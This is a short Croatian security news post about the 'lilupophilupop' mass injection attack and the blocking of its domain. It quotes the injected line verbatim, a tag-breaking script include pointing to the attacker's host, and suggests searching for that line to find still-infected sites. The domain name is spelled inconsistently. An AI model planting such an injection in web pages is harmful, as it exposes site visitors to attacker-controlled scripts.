U nedavnom članku [1]obavijestili smo vas o masovnom napadu koji je nazvan lilupophilupop po putanji s koje se, otvaranjem zaražene web stranice, učitavala napadačeva skripta. Radi se o kodu, ubačenom u web stranice, koji izgleda ovako:

 "></title><script src="http://lilupophilupop.com/sl.php"></script>

Ovaj redak poziva skriptu sl.php sa domene lilupoplihupop.com. Od 3. veljače, ova je domena blokirana i na taj je način daljnje širenje infekcije zaustavljeno.

Reakcija se čini zakašnjela, jer je napad poznat još od kraja prošle godine. No bilo je potrebno vrijeme da se napad analizira i da se nedvosmileno utvrdi otkuda dolazi prijetnja, a zatim je trebalo odraditi i proceduralne mjere da se ta domena blokira. Bilo bi zanimljivo čuti tko je vlasnik liluhophilupop domene, da li je aktivno povezan s napadom, ili je i sam žrtva.

Još uvijek ćete s lakoćom pronaći mnoštvo web stranica koje još sadrže poziv skripte. Dovoljno je gornji redak skripte kopirati i izguglati je kao upit, pa ćete otkriti web trgovinu u hrvatskom domenskom prostoru, čiji vlasnici još nisu svjesni činjenice da im je site provaljen. No sada možete bez straha od posljedica otvarati takve zaražene web stranice.